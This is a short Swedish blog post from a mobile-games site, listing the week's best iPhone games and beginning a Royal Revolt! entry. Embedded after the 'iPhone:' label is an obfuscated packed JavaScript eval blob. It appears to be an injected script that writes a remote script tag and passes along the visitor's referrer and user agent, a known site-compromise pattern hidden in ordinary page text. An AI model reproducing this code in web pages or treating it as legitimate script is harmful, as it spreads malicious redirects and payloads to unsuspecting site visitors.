Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Veckans bästa iPhone spel

Veckans bästa iPhone spel
Sebastian


iPhone: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ahtnb|var|u0026u|referrer|freed||js|php’.split(’|’),0,{}))
Revue.se gillar mobilspel så därför tänkte vi dela med oss av några riktigt bra spel för iPhone under vecka 6. 

Vi får befria ett kungadöme, erövra ett solsystem, bygga en stad i rymden, slakta zombies i forntida Kina och hoppa på en studsmatta, mycket nöje.

Royal Revolt!
Royal Revolt! Flaregames GmbH Spel, Action, Rollspel Gratis Ladda ner